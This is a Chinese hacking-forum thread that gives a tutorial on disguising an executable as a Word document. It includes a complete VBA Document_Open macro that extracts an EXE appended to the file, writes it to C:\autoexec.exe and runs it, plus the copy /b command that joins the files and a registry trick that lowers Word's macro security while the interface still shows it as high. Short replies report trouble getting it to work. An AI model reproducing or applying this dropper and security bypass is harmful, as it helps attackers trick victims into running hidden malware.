论坛: 黑客进阶 标题: EXE变DOC的方法,成功不了,哪位朋友成了就教一教我哟,谢谢了 复制本贴地址    
作者: ok0ok [ok0ok]    论坛用户   登录
EXE变DOC的方法 
 
其实这种转换并不是文件格式上的变化,只不过是把一个EXE文件接在一个DOC文件的末尾而已,这个DOC文件当然就不是不同WORD的文档啦,该文档中包含了宏语句,能在运行的时候把接在自己文件末尾的EXE文件数据读取出来并运行,就造成一种假象,好象文档打开时就运行了EXE文件似的.(和文件捆绑器的原理很象啊!) 

熟悉VB的朋友都知道,WORD的宏是使用VBA来编写的,具体语法和VB一样,但有些方法VB中没有,如宏病毒就是利用宏复制语句来达到感染的目的.和VB一样,我们可以在编写宏的时候调用WINDOWS API!!下面我们来介绍一下我们编写这个宏需要用到的API函数: 

1)CreateFile 用于打开文件,该函数VB的声明如下: 
Declare Function CreateFile Lib "kernel32" Alias "CreateFileA" (ByVal lpFileName As String, ByVal dwDesiredAccess As Long, ByVal dwShareMode As Long, ByVal lpSecurityAttributes As Long, ByVal dwCreationDistribution As Long, ByVal dwFlagsAndAttributes As Long, ByVal hTemplate As Long) As Long 


2)CloseHandle 用于关闭被打开文件的句柄,该函数VB的声明如下: 
Declare Function CloseHandle Lib "kernel32" (ByVal hObject As Long) As Long 


3)ReadFile 用于从被打开文件中读取数据,该函数VB的声明如下: 

Declare Function ReadFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToRead As Long, lpNumberOfBytesRead As Long, ByVal lpOverlapped As Long) As Long 


4)WriteFile 用于把读取出的数据写入文件,该函数VB的声明如下: 

Declare Function WriteFile Lib "kernel32" (ByVal hFile As Long, lpBuffer As Byte, ByVal dwNumberOfBytesToWrite As Long, lpNumberOfBytesWritten As Long, ByVal lpOverlapped As Long) As Long 


5)SetFilePoniter移动文件指针,该函数VB的声明如下: 

Declare Function SetFilePointer Lib "kernel32" (ByVal hFile As Long, ByVal lDistanceToMove As Long, ByVal lpDistanceToMoveHigh As Long, ByVal dwMoveMethod As Long) As Long 


6)下面是以上函数的参数声明 

Public Const GENERIC_READ As Long = &H80000000 

Public Const GENERIC_WRITE As Long = &H40000000 

Public Const FILE_SHARE_READ As Long = 1 

Public Const FILE_SHARE_WRITE As Long = 2 

Public Const CREATE_NEW As Long = 1 

Public Const CREATE_ALWAYS As Long = 2 

Public Const OPEN_EXISTING As Long = 3 

Public Const OPEN_ALWAYS As Long = 4 

Public Const TRUNCATE_EXISTING As Long = 5 

Public Const INVALID_HANDLE_value As Long = -1 

Public Const FILE_ATTRIBUTE_NORMAL As Long = &H80 


好了,有了这些准备工作就可以开始了,我们运行WORD2000,打开VISUAL BASIC编辑器,新建一个模块,把上面的函数和参数声明拷进去!再回到“ThisDocument”的代码视图,选择Document Open的事件,输入一下代码: 


Private Sub Document_Open() 

Dim buffer(65536) As Byte 

Dim h, h2, j, i, k As Long 

h = CreateFile(ThisDocument.Path & "/" & ThisDocument.Name, GENERIC_READ, FILE_SHARE_READ + FILE_SHARE_WRITE, 0, OPEN_EXISTING, 0, 0) 

‘以SHARE_READ的方式打开自身的DOC文件 

h2 = CreateFile("c:autoexec.exe", GENERIC_WRITE, 0, 0, CREATE_ALWAYS, 0, 0) 

‘新建一个EXE文件准备存放读取出来的数据. 

If h = INVALID_HANDLE_value Then 

Exit Sub 

End If 

k = SetFilePointer(h, 32768, nil, 0) 

‘把文件指针移动到DOC文件与EXE文件交界处. 

Do 

i = ReadFile(h, buffer(0), 65536, j, 0) 

i = WriteFile(h2, buffer(0), j, j, 0) 

Loop Until j < 65536 

CloseHandle (h) 

CloseHandle (h2) 

Shell "c:autoexec.exe" 

‘运行EXE文件 

End Sub 

这样宏就编写好了,注意的地方就是上面SetFilePointer函数的使用部分:32768是你编写完宏保存好的DOC文件的文件大小,不一顶就是32768哦,大家注意! 


大家可能有疑问,如何把EXE文件接到DOC文件后面呢?很简单,把你要接的EXE放到和这个DOC文件同一个目录下.运行DOC命令: 


copy /b xxxx.doc + xxxxx.exe newdoc.doc 


这样就可以了~~~.当你打开这个NEWDOC.DOC的时候,宏就会把后面的EXE文件读出来并保存在C:AUTOEXEC.EXE中,然后运行,是不是很恐怖啊!不过这需要你的WORD2000安全度为最低的时候才能实现,关于这个安全度的问题,我们又发现了微软的小BUG,大家看看注册表中这个键: 


HKEY_CURRENT_USERSoftwareMicrosoftOffice9.0WordSecurity 中的Level值.当安全度是3(高)的时候,WORD不会运行任何的宏,2(中)的时候WORD会询问你是否运行宏,1(低)的时候WORD就会自动运行所有的宏!但很容易就被发现安全度被设为低了,聪明的你一定想到如果这个值变为0的时候会怎么样!!??对了!如果设为0的话,WORD里面就会显示安全度为高,但却能自动运行任何的宏!!是不是很夸张??和注册表编辑器的后门一样这都是MS的后门吧? 
 


地主 发表时间: 07/02 22:27

回复: shesh [shesh]   版主   登录
需要改注册表,否则默认是不运行宏的.

B1层 发表时间: 07/03 09:10

回复: ok0ok [ok0ok]   论坛用户   登录
HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security

好像找不到这个键值哟,不知是不是我眼花

B2层 发表时间: 07/03 12:06

回复: ok0ok [ok0ok]   论坛用户   登录
可以生成个autoexec.exe 在c盘。但不是个可用的程序。

请指教

B3层 发表时间: 07/03 14:54

论坛: 黑客进阶

20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon

粤ICP备05087286号